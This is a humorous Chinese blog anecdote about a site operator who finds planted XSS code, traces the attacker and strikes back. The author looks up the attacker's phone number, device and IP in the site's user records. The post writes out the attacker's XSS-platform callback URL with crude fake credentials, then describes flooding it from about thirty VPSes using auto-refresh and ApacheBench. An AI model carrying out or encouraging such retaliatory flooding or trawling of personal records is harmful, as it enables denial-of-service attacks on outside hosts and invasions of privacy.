“偷鸡”趣事一则

好久没有参加娱乐活动了，今天遇到“偷鸡”趣事一则，随笔记录，聊以慰藉。

起因是早上看到昨天后半夜收到钉钉通知一则：

那行猥琐的代码深深地吸引了我，直接请求了一下。好家伙，XSS 代码：

有点不开心，你好歹专业一点。往这里插入 XSS 代码叫怎么回事嘛。再一看网站，还有这么个玩意儿：

有点兴趣了，不过账号注册需要验证手机号码。暂且作罢。到库里找到这个用户，查下手机号码：

短信下发时通道返回成功，说明这号码还能收到短信的：

基本判断是太空卡无疑了。再查下登录设备：

可以看到是水果设备登录的，虚拟的可能性较低。

看看还能挖点什么。一开始我没往登录 IP 去想，感觉至少一跳起步。谁知道阁下居然选择裸奔：

在线时间 + 拨号 IP，应该能溯源到宽带账号的。只不过国内的运营商是不 care 这种鸡毛蒜皮的小事的。毕竟没出人命不是，还是赚钱要紧。

又翻了翻库，发现这哥们其实早来过了。当时通知还没开，就没看到：

感觉这哥们儿真的该去挂号了。我看在眼里，急在心里。太空卡又打不通电话，怎么通知他呢？

找到了回调 URL，构造一个温馨的提示：

https://xsshs.cn/xss.php?do=api&id=8SyG&username=fuck_you&password=fuck_your_monther_20_miniutes_no_problem_by_bike

PS：感谢老夫子友情提供私人密码用于伟大的无产阶级测试。

然后，找了大约 30 台 VPS：

1、Windows 系统：360 浏览器大法，间隔 2s，自动刷新，走你；

2、Linux 系统：小盆友，ApacheBench 了解一下？

- EOF -